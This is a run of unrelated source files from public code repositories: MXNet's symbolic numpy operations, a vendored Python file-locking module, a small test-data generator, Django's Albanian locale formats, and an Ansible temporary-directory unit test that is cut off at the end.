@set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isposinf(x, out=None, **kwargs): """ Test element-wise for positive infinity, return result as bool array. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is positive infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. """ return _unary_func_helper(x, _npi.isposinf, _np.isposinf, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isneginf(x, out=None, **kwargs): """ Test element-wise for negative infinity, return result as bool array. Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is negative infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. """ return _unary_func_helper(x, _npi.isneginf, _np.isneginf, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def isfinite(x, out=None, **kwargs): """ Test element-wise for finiteness (not infinity or not Not a Number). Parameters ---------- x : _Symbol or scalar Input array. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- y : _Symbol or bool True where x is negative infinity, false otherwise. This is a scalar if x is a scalar. Notes ----- Not a Number, positive infinity and negative infinity are considered to be non-finite. NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754). This means that Not a Number is not equivalent to infinity. Also that positive infinity is not equivalent to negative infinity. But infinity is equivalent to positive infinity. Errors result if the second argument is also supplied when x is a scalar input, or if first and second arguments have different shapes. """ return _unary_func_helper(x, _npi.isfinite, _np.isfinite, out=out, **kwargs) @set_module('mxnet.symbol.numpy') def atleast_1d(*arys): """ Convert inputs to arrays with at least one dimension. Scalar inputs are converted to 1-dimensional arrays, whilst higher-dimensional inputs are preserved. Parameters ---------- arys1, arys2, ... : _Symbol One or more input arrays. Returns ------- ret : _Symbol An array, or list of arrays, each with a.ndim >= 1. Copies are made only if necessary. See also -------- atleast_2d, atleast_3d """ return _npi.atleast_1d(*arys) @set_module('mxnet.symbol.numpy') def atleast_2d(*arys): """ Convert inputs to arrays with at least two dimensions. Parameters ---------- arys1, arys2, ... : _Symbol One or more input arrays. Returns ------- ret : _Symbol An array, or list of arrays, each with a.ndim >= 2. Copies are made only if necessary. See also -------- atleast_1d, atleast_3d """ return _npi.atleast_2d(*arys) @set_module('mxnet.symbol.numpy') def atleast_3d(*arys): """ Convert inputs to arrays with at least three dimension. Parameters ---------- arys1, arys2, ... : _Symbol One or more input arrays. Returns ------- ret : _Symbol An array, or list of arrays, each with a.ndim >= 3. For example, a 1-D array of shape (N,) becomes a view of shape (1, N, 1), and a 2-D array of shape (M, N) becomes a view of shape (M, N, 1). See also -------- atleast_1d, atleast_2d """ return _npi.atleast_3d(*arys) @set_module('mxnet.symbol.numpy') def where(condition, x, y): """ Return elements chosen from `x` or `y` depending on `condition`. Parameters ---------- condition : _Symbol Where True, yield `x`, otherwise yield `y`. x, y : _Symbol Values from which to choose. `x`, `y` and `condition` need to be broadcastable to some shape. `x` and `y` must have the same dtype. Returns ------- out : _Symbol An array with elements from `x` where `condition` is True, and elements from `y` elsewhere. """ if isinstance(condition, numeric_types): if condition != 0: return x else: return y else: if isinstance(x, numeric_types) and isinstance(y, numeric_types): return _npi.where_scalar2(condition, float(x), float(y), out=None) elif isinstance(x, Symbol) and isinstance(y, Symbol): return _npi.where(condition, x, y, out=None) elif isinstance(y, Symbol): return _npi.where_lscalar(condition, y, float(x), out=None) elif isinstance(x, Symbol): return _npi.where_rscalar(condition, x, float(y), out=None) else: raise TypeError('type {0} and {1} not supported'.format(str(type(x)), str(type(y)))) @set_module('mxnet.symbol.numpy') def load(fname): """Loads symbol from a JSON file. You can also use pickle to do the job if you only work on python. The advantage of load/save is the file is language agnostic. This means the file saved using save can be loaded by other language binding of mxnet. You also get the benefit being able to directly load/save from cloud storage(S3, HDFS). Parameters ---------- fname : str The name of the file, examples: - `s3://my-bucket/path/my-s3-symbol` - `hdfs://my-bucket/path/my-hdfs-symbol` - `/path-to/my-local-symbol` Returns ------- sym : _Symbol The loaded symbol. See Also -------- _Symbol.save : Used to save symbol into file. """ if not isinstance(fname, string_types): raise TypeError('fname needs to be string') handle = SymbolHandle() check_call(_LIB.MXSymbolCreateFromFile(c_str(fname), ctypes.byref(handle))) return _Symbol(handle) @set_module('mxnet.symbol.numpy') def load_json(json_str): """Loads symbol from json string. Parameters ---------- json_str : str A JSON string. Returns ------- sym : Symbol The loaded symbol. See Also -------- _Symbol.tojson : Used to save symbol into json string. """ if not isinstance(json_str, string_types): raise TypeError('json_str needs to be string') handle = SymbolHandle() check_call(_LIB.MXSymbolCreateFromJSON(c_str(json_str), ctypes.byref(handle))) return _Symbol(handle) @set_module('mxnet.symbol.numpy') def polyval(p, x): """ Evaluate a polynomial at specific values. If p is of length N, this function returns the value: p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1] If x is a sequence, then p(x) is returned for each element of x. If x is another polynomial then the composite polynomial p(x(t)) is returned. Parameters ---------- p : _Symbol 1D array of polynomial coefficients (including coefficients equal to zero) from highest degree to the constant term. x : _Symbol An array of numbers, at which to evaluate p. Returns ------- values : _Symbol Result array of polynomials Notes ----- This function differs from the original `numpy.polyval <https://numpy.org/devdocs/reference/generated/numpy.polyval.html>`_ in the following way(s): - Does not support poly1d. - X should be ndarray type even if it contains only one element. """ if isinstance(p, Symbol) and isinstance(x, Symbol): return _npi.polyval(p, x) elif not isinstance(p, Symbol) and not isinstance(x, Symbol): return _np.polyval(p, x) else: raise TypeError('type not supported') @set_module('mxnet.symbol.numpy') def bincount(x, weights=None, minlength=0): """ Count number of occurrences of each value in array of non-negative ints. Parameters ---------- x : _Symbol input data weights: _Symbol input weigths same shape as x. (Optional) minlength: int A minimum number of bins for the output. (Optional) Returns -------- out : _Symbol the result of binning the input data. The length of out is equal to amax(x)+1. Raises: -------- Value Error If the input is not 1-dimensional, or contains elements with negative values, or if minlength is negative TypeError If the type of the input is float or complex. """ if minlength < 0: raise ValueError("Minlength value should greater than 0") if weights is None: return _npi.bincount(x, minlength=minlength, has_weights=False) return _npi.bincount(x, weights=weights, minlength=minlength, has_weights=True) @set_module('mxnet.symbol.numpy') def pad(x, pad_width, mode='constant', **kwargs): # pylint: disable=too-many-arguments """ Pad an array. Parameters ---------- array : array_like of rank N The array to pad. pad_width : {sequence, array_like, int} Number of values padded to the edges of each axis. ((before_1, after_1), ... (before_N, after_N)) unique pad widths for each axis. ((before, after),) yields same before and after pad for each axis. (pad,) or int is a shortcut for before = after = pad width for all axes. mode : str or function, optional One of the following string values or a user supplied function. 'constant' (default) Pads with a constant value. 'edge' Pads with the edge values of array. 'linear_ramp' not supported yet 'maximum' Pads with the maximum value of all of the vector along each axis. 'mean' not supported yet 'median' not supported yet 'minimum' Pads with the minimum value of all of the vector along each axis. 'reflect' Pads with the reflection of the vector mirrored on the first and last values of the vector along each axis. 'symmetric' Pads with the reflection of the vector mirrored along the edge of the array. 'wrap' not supported yet. 'empty' not supported yet. <function> not supported yet. stat_length : not supported yet constant_values : scalar, optional Used in 'constant'. The values to set the padded values for each axis. Default is 0. end_values : not supported yet reflect_type : {'even', 'odd'}, optional only support even now Returns ------- pad : ndarray Padded array of rank equal to `array` with shape increased according to `pad_width`. """ # pylint: disable = too-many-return-statements, inconsistent-return-statements if not _np.asarray(pad_width).dtype.kind == 'i': raise TypeError('`pad_width` must be of integral type.') if not isinstance(pad_width, tuple): raise TypeError("`pad_width` must be tuple.") if mode == "linear_ramp": raise ValueError("mode {'linear_ramp'} is not supported.") if mode == "wrap": raise ValueError("mode {'wrap'} is not supported.") if mode == "median": raise ValueError("mode {'median'} is not supported.") if mode == "mean": raise ValueError("mode {'mean'} is not supported.") if mode == "empty": raise ValueError("mode {'empty'} is not supported.") if callable(mode): raise ValueError("mode {'<function>'} is not supported.") allowedkwargs = { 'constant': ['constant_values'], 'edge': [], 'linear_ramp': ['end_values'], 'maximum': ['stat_length'], 'mean': ['stat_length'], 'median': ['stat_length'], 'minimum': ['stat_length'], 'reflect': ['reflect_type'], 'symmetric': ['reflect_type'], 'wrap': [], } if isinstance(mode, _np.compat.basestring): # Make sure have allowed kwargs appropriate for mode for key in kwargs: if key not in allowedkwargs[mode]: raise ValueError('%s keyword not in allowed keywords %s' %(key, allowedkwargs[mode])) unsupported_kwargs = set(kwargs) - set(allowedkwargs[mode]) if unsupported_kwargs: raise ValueError("unsupported keyword arguments for mode '{}': {}" .format(mode, unsupported_kwargs)) if mode == "constant": values = kwargs.get("constant_values", 0) if isinstance(values, tuple): raise TypeError("unsupported constant_values type: {'tuple'}.") return _npi.pad(x, pad_width, mode='constant', constant_values=values) elif mode == "symmetric": values = kwargs.get("reflect_type", "even") if values != "even" and values is not None: raise ValueError("unsupported reflect_type '{}'".format(values)) return _npi.pad(x, pad_width, mode='symmetric', reflect_type="even") elif mode == "edge": return _npi.pad(x, pad_width, mode='edge') elif mode == "reflect": values = kwargs.get("reflect_type", "even") if values != "even" and values is not None: raise ValueError("unsupported reflect_type '{}'".format(values)) return _npi.pad(x, pad_width, mode='reflect', reflect_type="even") elif mode == "maximum": values = kwargs.get("stat_length", None) if values is not None: raise ValueError("unsupported stat_length '{}'".format(values)) return _npi.pad(x, pad_width, mode='maximum') elif mode == "minimum": values = kwargs.get("stat_length", None) if values is not None: raise ValueError("unsupported stat_length '{}'".format(values)) return _npi.pad(x, pad_width, mode='minimum') return _npi.pad(x, pad_width, mode='constant', constant_values=0) @set_module('mxnet.symbol.numpy') def prod(a, axis=None, dtype=None, keepdims=False, initial=None, output=None): # pylint: disable=too-many-arguments """ Return the product of array elements over a given axis. Parameters ---------- a : array_like Input data. axis : None or int or tuple of ints, optional Axis or axes along which a product is performed. The default, axis=None, will calculate the product of all the elements in the input array. If axis is negative it counts from the last to the first axis. .. versionadded:: 1.7.0 If axis is a tuple of ints, a product is performed on all of the axes specified in the tuple instead of a single axis or all the axes as before. dtype : dtype, optional The type of the returned array, as well as of the accumulator in which the elements are multiplied. The dtype of `a` is used by default unless `a` has an integer dtype of less precision than the default platform integer. In that case, if `a` is signed then the platform integer is used while if `a` is unsigned then an unsigned integer of the same precision as the platform integer is used. out : ndarray, optional Alternative output array in which to place the result. It must have the same shape as the expected output, but the type of the output values will be cast if necessary. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then `keepdims` will not be passed through to the `prod` method of sub-classes of `ndarray`, however any non-default value will be. If the sub-class' method does not implement `keepdims` any exceptions will be raised. initial : scalar, optional The starting value for this product. See `~numpy.ufunc.reduce` for details. where : not supported Returns ------- product_along_axis : ndarray, see `dtype` parameter above. An array shaped as `a` but with the specified axis removed. Returns a reference to `out` if specified. Examples -------- By default, calculate the product of all elements: >>> np.prod([1.,2.]) 2.0 Even when the input array is two-dimensional: >>> np.prod([[1.,2.],[3.,4.]]) 24.0 But we can also specify the axis over which to multiply: >>> np.prod([[1.,2.],[3.,4.]], axis=1) array([ 2., 12.]) Or select specific elements to include: >>> np.prod([1., np.nan, 3.], where=[True, False, True]) 3.0 If the type of `x` is unsigned, then the output type is the unsigned platform integer: >>> x = np.array([1, 2, 3], dtype=np.uint8) >>> np.prod(x).dtype == np.uint True If `x` is of a signed integer type, then the output type is the default platform integer: >>> x = np.array([1, 2, 3], dtype=np.int8) >>> np.prod(x).dtype == int True You can also start the product with a value other than one: >>> np.prod([1, 2], initial=5) 10 """ return _npi.prod(a, axis=axis, dtype=dtype, keepdims=keepdims, initial=initial) @set_module('mxnet.symbol.numpy') def cumsum(a, axis=None, dtype=None, out=None): """ Return the cumulative sum of the elements along a given axis. Parameters ---------- a : _Symbol Input array. axis : int, optional Axis along which the cumulative sum is computed. The default (None) is to compute the cumsum over the flattened array. dtype : dtype, optional Type of the returned array and of the accumulator in which the elements are summed. If `dtype` is not specified, it defaults to the dtype of `a`, unless `a` has an integer dtype with a precision less than that of the default platform integer. In that case, the default platform integer is used. out : _Symbol, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output but the type will be cast if necessary. See `doc.ufuncs` (Section "Output arguments") for more details. Returns ------- cumsum_along_axis : _Symbol. A new array holding the result is returned unless `out` is specified, in which case a reference to `out` is returned. The result has the same size as `a`, and the same shape as `a` if `axis` is not None or `a` is a 1-d array. """ return _npi.cumsum(a, axis=axis, dtype=dtype, out=out) @set_module('mxnet.symbol.numpy') def reshape(a, newshape, reverse=False, order='C'): """ Gives a new shape to an array without changing its data. This function always returns a copy of the input array if ``out`` is not provided. Parameters ---------- a : _Symbol Array to be reshaped. newshape : int or tuple of ints The new shape should be compatible with the original shape. If an integer, then the result will be a 1-D array of that length. One shape dimension can be -1. In this case, the value is inferred from the length of the array and remaining dimensions. order : {'C'}, optional Read the elements of `a` using this index order, and place the elements into the reshaped array using this index order. 'C' means to read / write the elements using C-like index order, with the last axis index changing fastest, back to the first axis index changing slowest. Other order types such as 'F'/'A' may be added in the future. Returns ------- reshaped_array : _Symbol It will be always a copy of the original array. This behavior is different from the official NumPy ``reshape`` operator where views of the original array may be generated. See Also -------- ndarray.reshape : Equivalent method. Examples -------- >>> a = np.arange(6).reshape((3, 2)) >>> a array([[0., 1.], [2., 3.], [4., 5.]]) >>> np.reshape(a, (2, 3)) # C-like index ordering array([[0., 1., 2.], [3., 4., 5.]]) >>> np.reshape(np.ravel(a), (2, 3)) # equivalent to C ravel then C reshape array([[0., 1., 2.], [3., 4., 5.]]) >>> a = np.array([[1,2,3], [4,5,6]]) >>> np.reshape(a, 6) array([1., 2., 3., 4., 5., 6.]) >>> np.reshape(a, (3,-1)) # the unspecified value is inferred to be 2 array([[1., 2.], [3., 4.], [5., 6.]]) """ return _npi.reshape(a, newshape, reverse, order) @set_module('mxnet.symbol.numpy') def moveaxis(a, source, destination): """Move axes of an array to new positions. Other axes remain in their original order. Parameters ---------- a : _Symbol The array whose axes should be reordered. source : int or sequence of int Original positions of the axes to move. These must be unique. destination : int or sequence of int Destination positions for each of the original axes. These must also be unique. Returns ------- result : _Symbol Array with moved axes. This array is a view of the input array. See Also -------- transpose: Permute the dimensions of an array. swapaxes: Interchange two axes of an array. Examples -------- >>> x = np.zeros((3, 4, 5)) >>> np.moveaxis(x, 0, -1).shape (4, 5, 3) >>> np.moveaxis(x, -1, 0).shape (5, 3, 4) These all achieve the same result: >>> np.transpose(x).shape (5, 4, 3) >>> np.swapaxes(x, 0, -1).shape (5, 4, 3) >>> np.moveaxis(x, [0, 1], [-1, -2]).shape (5, 4, 3) >>> np.moveaxis(x, [0, 1, 2], [-1, -2, -3]).shape (5, 4, 3) """ return _npi.moveaxis(a, source, destination) @set_module('mxnet.symbol.numpy') def copy(a): # pylint: disable=redefined-outer-name """ Return an array copy of the given object. Parameters ---------- a : _Symbol Input array. Returns ------- arr : _Symbol Array interpretation of a. ----- Examples -------- >>> x = np.array([1, 2, 3]) >>> y = x >>> z = np.copy(x) >>> x[0] = 10 >>> x[0] == y[0] True >>> x[0] == z[0] False """ return _npi.copy(a) @set_module('mxnet.symbol.numpy') def rollaxis(a, axis, start=0): """ Roll the specified axis backwards, until it lies in a given position. Parameters ---------- a : _Symbol Input array. axis : integer The axis to roll backwards. The positions of the other axes do not change relative to one another. start: int, optional The axis is rolled until it lies before this position. The default, 0, results in a “complete” roll. Returns ------- res : _Symbol A view after applying rollaxis to `a` is returned. ----- Examples -------- >>> a = np.ones((3,4,5,6)) >>> np.rollaxis(a, 3, 1).shape (3, 6, 4, 5) >>> np.rollaxis(a, 2).shape (5, 3, 4, 6) >>> np.rollaxis(a, 1, 4).shape (3, 5, 6, 4) """ return _npi.rollaxis(a, axis, start) @set_module('mxnet.symbol.numpy') def diag(v, k=0): """ Extracts a diagonal or constructs a diagonal array. - 1-D arrays: constructs a 2-D array with the input as its diagonal, all other elements are zero. - 2-D arrays: extracts the k-th Diagonal Parameters ---------- array : _Symbol The array to apply diag method. k : offset extracts or constructs kth diagonal given input array Returns ---------- out : _Symbol The extracted diagonal or constructed diagonal array. """ return _npi.diag(v, k=k) @set_module('mxnet.symbol.numpy') def diagflat(v, k=0): """ Create a two-dimensional array with the flattened input as a diagonal. Parameters ---------- v : array_like Input data, which is flattened and set as the `k`-th diagonal of the output. k : int, optional Diagonal to set; 0, the default, corresponds to the "main" diagonal, a positive (negative) `k` giving the number of the diagonal above (below) the main. Returns ------- out : ndarray The 2-D output array. See Also -------- diag : MATLAB work-alike for 1-D and 2-D arrays. diagonal : Return specified diagonals. trace : Sum along diagonals. Examples -------- >>> np.diagflat([[1,2], [3,4]]) array([[1, 0, 0, 0], [0, 2, 0, 0], [0, 0, 3, 0], [0, 0, 0, 4]]) >>> np.diagflat([1,2], 1) array([[0, 1, 0], [0, 0, 2], [0, 0, 0]]) """ return _npi.diagflat(v, k=k) @set_module('mxnet.symbol.numpy') def diagonal(a, offset=0, axis1=0, axis2=1): """ If a is 2-D, returns the diagonal of a with the given offset, i.e., the collection of elements of the form a[i, i+offset]. If a has more than two dimensions, then the axes specified by axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is returned. The shape of the resulting array can be determined by removing axis1 and axis2 and appending an index to the right equal to the size of the resulting diagonals. Parameters ---------- a : _Symbol Input data from which diagonal are taken. offset: int, Optional Offset of the diagonal from the main diagonal axis1: int, Optional Axis to be used as the first axis of the 2-D sub-arrays axis2: int, Optional Axis to be used as the second axis of the 2-D sub-arrays Returns ------- out : _Symbol Output result Raises ------- ValueError: If the dimension of a is less than 2. """ return _npi.diagonal(a, offset=offset, axis1=axis1, axis2=axis2) # pylint:disable=redefined-outer-name, too-many-arguments @set_module('mxnet.symbol.numpy') def sum(a, axis=None, dtype=None, out=None, keepdims=False, initial=None, where=None): r""" Sum of array elements over a given axis. Parameters ---------- a : _Symbol Input data. axis : None or int, optional Axis or axes along which a sum is performed. The default, axis=None, will sum all of the elements of the input array. If axis is negative it counts from the last to the first axis. dtype : dtype, optional The type of the returned array and of the accumulator in which the elements are summed. The default type is float32. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then `keepdims` will not be passed through to the `sum` method of sub-classes of `ndarray`, however any non-default value will be. If the sub-classes `sum` method does not implement `keepdims` any exceptions will be raised. initial: Currently only supports None as input, optional Starting value for the sum. Currently not implemented. Please use ``None`` as input or skip this argument. out : ndarray or None, optional Alternative output array in which to place the result. It must have the same shape and dtype as the expected output. Returns ------- sum_along_axis : _Symbol An ndarray with the same shape as `a`, with the specified axis removed. If an output array is specified, a reference to `out` is returned. """ if where is not None and where is not True: raise ValueError("only where=None or where=True cases are supported for now") return _npi.sum(a, axis=axis, dtype=dtype, keepdims=keepdims, initial=initial, out=out) # pylint:enable=redefined-outer-name, too-many-arguments _set_np_symbol_class(_Symbol)
yd0str/infernal-twin
refs/heads/master
build/pip/build/lib.linux-i686-2.7/pip/_vendor/lockfile/__init__.py
475
""" lockfile.py - Platform-independent advisory file locks. Requires Python 2.5 unless you apply 2.4.diff Locking is done on a per-thread basis instead of a per-process basis. Usage: >>> lock = LockFile('somefile') >>> try: ... lock.acquire() ... except AlreadyLocked: ... print 'somefile', 'is locked already.' ... except LockFailed: ... print 'somefile', 'can\\'t be locked.' ... else: ... print 'got lock' got lock >>> print lock.is_locked() True >>> lock.release() >>> lock = LockFile('somefile') >>> print lock.is_locked() False >>> with lock: ... print lock.is_locked() True >>> print lock.is_locked() False >>> lock = LockFile('somefile') >>> # It is okay to lock twice from the same thread... >>> with lock: ... lock.acquire() ... >>> # Though no counter is kept, so you can't unlock multiple times... >>> print lock.is_locked() False Exceptions: Error - base class for other exceptions LockError - base class for all locking exceptions AlreadyLocked - Another thread or process already holds the lock LockFailed - Lock failed for some other reason UnlockError - base class for all unlocking exceptions AlreadyUnlocked - File was not locked. NotMyLock - File was locked but not by the current thread/process """ from __future__ import absolute_import import sys import socket import os import threading import time import urllib import warnings import functools # Work with PEP8 and non-PEP8 versions of threading module. if not hasattr(threading, "current_thread"): threading.current_thread = threading.currentThread if not hasattr(threading.Thread, "get_name"): threading.Thread.get_name = threading.Thread.getName __all__ = ['Error', 'LockError', 'LockTimeout', 'AlreadyLocked', 'LockFailed', 'UnlockError', 'NotLocked', 'NotMyLock', 'LinkLockFile', 'MkdirLockFile', 'SQLiteLockFile', 'LockBase', 'locked'] class Error(Exception): """ Base class for other exceptions. >>> try: ... raise Error ... except Exception: ... pass """ pass class LockError(Error): """ Base class for error arising from attempts to acquire the lock. >>> try: ... raise LockError ... except Error: ... pass """ pass class LockTimeout(LockError): """Raised when lock creation fails within a user-defined period of time. >>> try: ... raise LockTimeout ... except LockError: ... pass """ pass class AlreadyLocked(LockError): """Some other thread/process is locking the file. >>> try: ... raise AlreadyLocked ... except LockError: ... pass """ pass class LockFailed(LockError): """Lock file creation failed for some other reason. >>> try: ... raise LockFailed ... except LockError: ... pass """ pass class UnlockError(Error): """ Base class for errors arising from attempts to release the lock. >>> try: ... raise UnlockError ... except Error: ... pass """ pass class NotLocked(UnlockError): """Raised when an attempt is made to unlock an unlocked file. >>> try: ... raise NotLocked ... except UnlockError: ... pass """ pass class NotMyLock(UnlockError): """Raised when an attempt is made to unlock a file someone else locked. >>> try: ... raise NotMyLock ... except UnlockError: ... pass """ pass class LockBase: """Base class for platform-specific lock classes.""" def __init__(self, path, threaded=True, timeout=None): """ >>> lock = LockBase('somefile') >>> lock = LockBase('somefile', threaded=False) """ self.path = path self.lock_file = os.path.abspath(path) + ".lock" self.hostname = socket.gethostname() self.pid = os.getpid() if threaded: t = threading.current_thread() # Thread objects in Python 2.4 and earlier do not have ident # attrs. Worm around that. ident = getattr(t, "ident", hash(t)) self.tname = "-%x" % (ident & 0xffffffff) else: self.tname = "" dirname = os.path.dirname(self.lock_file) # unique name is mostly about the current process, but must # also contain the path -- otherwise, two adjacent locked # files conflict (one file gets locked, creating lock-file and # unique file, the other one gets locked, creating lock-file # and overwriting the already existing lock-file, then one # gets unlocked, deleting both lock-file and unique file, # finally the last lock errors out upon releasing. self.unique_name = os.path.join(dirname, "%s%s.%s%s" % (self.hostname, self.tname, self.pid, hash(self.path))) self.timeout = timeout def acquire(self, timeout=None): """ Acquire the lock. * If timeout is omitted (or None), wait forever trying to lock the file. * If timeout > 0, try to acquire the lock for that many seconds. If the lock period expires and the file is still locked, raise LockTimeout. * If timeout <= 0, raise AlreadyLocked immediately if the file is already locked. """ raise NotImplemented("implement in subclass") def release(self): """ Release the lock. If the file is not locked, raise NotLocked. """ raise NotImplemented("implement in subclass") def is_locked(self): """ Tell whether or not the file is locked. """ raise NotImplemented("implement in subclass") def i_am_locking(self): """ Return True if this object is locking the file. """ raise NotImplemented("implement in subclass") def break_lock(self): """ Remove a lock. Useful if a locking thread failed to unlock. """ raise NotImplemented("implement in subclass") def __enter__(self): """ Context manager support. """ self.acquire() return self def __exit__(self, *_exc): """ Context manager support. """ self.release() def __repr__(self): return "<%s: %r -- %r>" % (self.__class__.__name__, self.unique_name, self.path) def _fl_helper(cls, mod, *args, **kwds): warnings.warn("Import from %s module instead of lockfile package" % mod, DeprecationWarning, stacklevel=2) # This is a bit funky, but it's only for awhile. The way the unit tests # are constructed this function winds up as an unbound method, so it # actually takes three args, not two. We want to toss out self. if not isinstance(args[0], str): # We are testing, avoid the first arg args = args[1:] if len(args) == 1 and not kwds: kwds["threaded"] = True return cls(*args, **kwds) def LinkFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import LinkLockFile from the lockfile.linklockfile module. """ from . import linklockfile return _fl_helper(linklockfile.LinkLockFile, "lockfile.linklockfile", *args, **kwds) def MkdirFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import MkdirLockFile from the lockfile.mkdirlockfile module. """ from . import mkdirlockfile return _fl_helper(mkdirlockfile.MkdirLockFile, "lockfile.mkdirlockfile", *args, **kwds) def SQLiteFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import SQLiteLockFile from the lockfile.mkdirlockfile module. """ from . import sqlitelockfile return _fl_helper(sqlitelockfile.SQLiteLockFile, "lockfile.sqlitelockfile", *args, **kwds) def locked(path, timeout=None): """Decorator which enables locks for decorated function. Arguments: - path: path for lockfile. - timeout (optional): Timeout for acquiring lock. Usage: @locked('/var/run/myname', timeout=0) def myname(...): ... """ def decor(func): @functools.wraps(func) def wrapper(*args, **kwargs): lock = FileLock(path, timeout=timeout) lock.acquire() try: return func(*args, **kwargs) finally: lock.release() return wrapper return decor if hasattr(os, "link"): from . import linklockfile as _llf LockFile = _llf.LinkLockFile else: from . import mkdirlockfile as _mlf LockFile = _mlf.MkdirLockFile FileLock = LockFile
qingpengchen2011/algorithm-study
refs/heads/master
algo-analyse/week6/2-sum/test_gen.py
1
a = [0] * 1000000; t = 0; modulus = 2 ** 24; for i in xrange(1000000) : t = (615949*t + 797807) % modulus a[i] = t - modulus / 2 for i in (20,100,1000,10000,100000,1000000) : fname = "sum2tc_%d.txt" % i f = open(fname,"w") for j in xrange(i) : f.write("%d\n" % a[j]) f.close()
ttglennhall/DjangoGirlsTutorial
refs/heads/master
myvenv/lib/python3.4/site-packages/django/conf/locale/sq/formats.py
619
# -*- encoding: utf-8 -*- # This file is distributed under the same license as the Django package. # from __future__ import unicode_literals # The *_FORMAT strings use the Django date format syntax, # see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date DATE_FORMAT = 'd F Y' TIME_FORMAT = 'g.i.A' # DATETIME_FORMAT = YEAR_MONTH_FORMAT = 'F Y' MONTH_DAY_FORMAT = 'j F' SHORT_DATE_FORMAT = 'Y-m-d' # SHORT_DATETIME_FORMAT = # FIRST_DAY_OF_WEEK = # The *_INPUT_FORMATS strings use the Python strftime format syntax, # see http://docs.python.org/library/datetime.html#strftime-strptime-behavior # DATE_INPUT_FORMATS = # TIME_INPUT_FORMATS = # DATETIME_INPUT_FORMATS = DECIMAL_SEPARATOR = ',' THOUSAND_SEPARATOR = '.' # NUMBER_GROUPING =
maxamillion/ansible
refs/heads/devel
test/units/module_utils/basic/test_tmpdir.py
35
# -*- coding: utf-8 -*- # Copyright (c) 2018 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import json import os import shutil import tempfile import pytest from units.compat.mock import patch, MagicMock from ansible.module_utils._text import to_bytes from ansible.module_utils import basic class TestAnsibleModuleTmpDir: DATA = ( ( { "_ansible_tmpdir": "/path/to/dir", "_ansible_remote_tmp": "/path/tmpdir", "_ansible_keep_remote_files": False, }, True, "/path/to/dir" ), ( { "_ansible_tmpdir": None, "_ansible_remote_tmp": "/path/tmpdir", "_ansible_keep_remote_files": False }, False, "/path/tmpdir/ansible-moduletmp-42-" ), ( { "_ansible_tmpdir": None, "_ansible_remote_tmp": "/path/tmpdir", "_ansible_keep_remote_files": False }, True, "/path/tmpdir/ansible-moduletmp-42-" ), ( { "_ansible_tmpdir": None, "_ansible_remote_tmp": "$HOME/.test", "_ansible_keep_remote_files": False }, False, os.path.join(os.environ['HOME'], ".test/ansible-moduletmp-42-") ), ) # pylint bug: https://github.com/PyCQA/pylint/issues/511 # pylint: disable=undefined-variable @pytest.mark.parametrize('args, expected, stat_exists', ((s, e, t) for s, t, e in DATA)) def test_tmpdir_property(self, monkeypatch, args, expected, stat_exists): makedirs = {'called': False} def mock_mkdtemp(prefix, dir): return os.path.join(dir, prefix) def mock_makedirs(path, mode): makedirs['called'] = True makedirs['path'] = path makedirs['mode'] = mode return monkeypatch.setattr(tempfile, 'mkdtemp', mock_mkdtemp) monkeypatch.setattr(os.path, 'exists', lambda x: stat_exists) monkeypatch.setattr(os, 'makedirs', mock_makedirs) monkeypatch.setattr(shutil, 'rmtree', lambda x: None) monkeypatch.setattr(basic, '_ANSIBLE_ARGS', to_bytes(json.dumps({'ANSIBLE_MODULE_ARGS': args}))) with patch('time.time', return_value=42): am = basic.AnsibleModule(argument_spec={}) actual_tmpdir = am.tmpdir assert actual_tmpdir == expected # verify subsequent calls always produces the same tmpdir assert am.tmpdir == actual_tmpdir if not stat_exists: assert makedirs['called'] expected = os.path.expanduser(os.path.expandvars(am._remote_tmp)) assert makedirs['path'] == expected assert makedirs['mode'] == 0o700 @pytest.mark.parametrize('stdin', ({"_ansible_tmpdir": None, "_ansible_remote_tmp": "$HOME/.test", "_ansible_keep_remote_files": True},), indirect=['stdin']) def test_tmpdir_makedirs_failure(self, am, monkeypatch): mock_mkdtemp = MagicMock(return_value="/tmp/path") mock_makedirs = MagicMock(side_effect=OSError("Some OS Error here")) monkeypatch.setattr(tempfile, 'mkdtemp', mock_mkdtemp) monkeypatch.setattr(os.path, 'exists', lambda x: False) monkeypatch.setattr(os, 'makedirs', mock_makedirs) actual = am.tmpdir assert actual == "/tmp/path" assert mock_makedirs.call_args[0] == (os.path.expanduser(os.path.expandvars("$HOME/.test")),) assert mock_makedirs.call_args[1] == {"mode": 0o700} # because makedirs failed the dir should be None so it uses the System tmp assert mock_mkdtemp.call_args[1]['dir'] is None assert 